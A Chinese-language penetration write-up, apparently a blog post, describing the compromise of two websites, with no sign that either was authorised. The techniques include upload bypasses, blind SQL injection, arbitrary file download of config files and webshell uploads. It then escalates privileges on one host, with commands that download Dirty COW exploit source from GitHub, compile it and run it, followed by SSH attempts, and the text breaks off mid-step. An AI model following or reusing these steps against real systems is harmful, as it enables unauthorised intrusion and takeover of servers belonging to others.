国外站，翻译的我尴尬证都犯了。

习惯性先发文章看看编辑器上传附件什么的。

四处上传，首先尝试编辑器处上传图片，经验告诉我越low的编辑器越好拿shell。

我错了，白名单+上传重命名，smarteditor编辑器，各种截断尝试，突破不了。

这编辑器无敌。随后发现另外三处均是调用此编辑器上传，暂时换思路。

在已经发布的文章中发现绝对路径

测试后发现public_html为根目录，决定挖挖注入，万一是root没降权就舒服了。

经过手动加sqlmap测试，发现后台存在时间盲注，由于国外站点访问不稳定的原因，遂放弃，在后期getshell之后发现用户不是root并且权限死得很，为之庆幸并没有在此处浪费时间。

到此处思路死了。编辑器getshell无解，sql注入getshell卒。还有什么思路呢？

我们之前爆出绝对路径的url访问后发现会自动下载

存在任意文件下载吗？先构造一下尝试

bingo！

存在任意文件下载，我们找下数据库配置文件

index.php一般会引入数据库的config.php

重新构造

数据库配置get！后发现没开3306外链，思路断掉。

在这个时候我重新回头看这个任意文件下载，读一下敏感文件试试？

password被注释掉，无用。

没发现有可用信息。

下载apache配置文件

惊了！html可以被当作php文件！

于是我去编辑器中尝试上传这几种文件，仍以失败告终。

但是附件的我们还没试！

抓包改后缀，返回文章查看路径

拼接

getshell!

后面的就不说了，提权就是脏牛+bypass disablefunc一条龙，没啥亮点。

本章结束，寡人欲休。

或许这就是大佬吧。

大佬召唤，我不得不起床。
进入后台，寻找上传点，卧槽，发现FCK编辑器哎

我们的XZ大佬现在连FCK编辑器都拿不下来了吗？那就到我装逼的时候了！
然后GG，点击上传图片竟然。。

怪不得，大佬可是给我扔了个黑锅啊。不过还好，旁边还有一个小文件上传，是个上传点。

可是看到这个布局我突然有一种不详的预感。管他呢，burp一顿怼之后，草草放弃了。
因为不管怎么改文件名怎么截断都不解析啊。算了，再翻翻其他的。

这个语言包管理直觉是能够利用，不过可能还要百度源代码审计，想想放弃了，毕竟人家还是小白呢。

继续翻，我就不信了，发现又一个上传点！

好熟悉啊，和刚才发布文章的页面一毛一样！竟然在这有上传点。

那就开怼把！点击插入图片之后是这个样子

很草率啊，不知道能不能上传。先上传一张正常的试试

竟然ok？！那就再试试直接传php后缀的

也上传成功了，但是没有返回路径？？？不急，我记得有一个文件管理。

果然ojbk了。

有没有很佩服我优秀的打码呢？
虚拟终端

[*] 基本信息 [     Linux xxx 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64(xxx) ]
[/wwwroot/upfiles/201802/11/]$ whoami
damachuli
[/wwwroot/upfiles/201802/11/]$ uname -a
Linux xxx 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux

竟然是Linux机器，2012年的，我们可以试试脏牛详情看这里

下载
wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c
编译
gcc -pthread dirty.c -o dirty -lcrypt
运行
./dirty 123456

然后尝试链接提示

fuzz@DESKTOP-JJAMRAA:~$ ssh root@114.80.xxx.xxx
ssh: connect to host 114.80.xxx.xxx port 22: Connection refused

netstat -ntpl查看端口

尝试后发现是55022
链接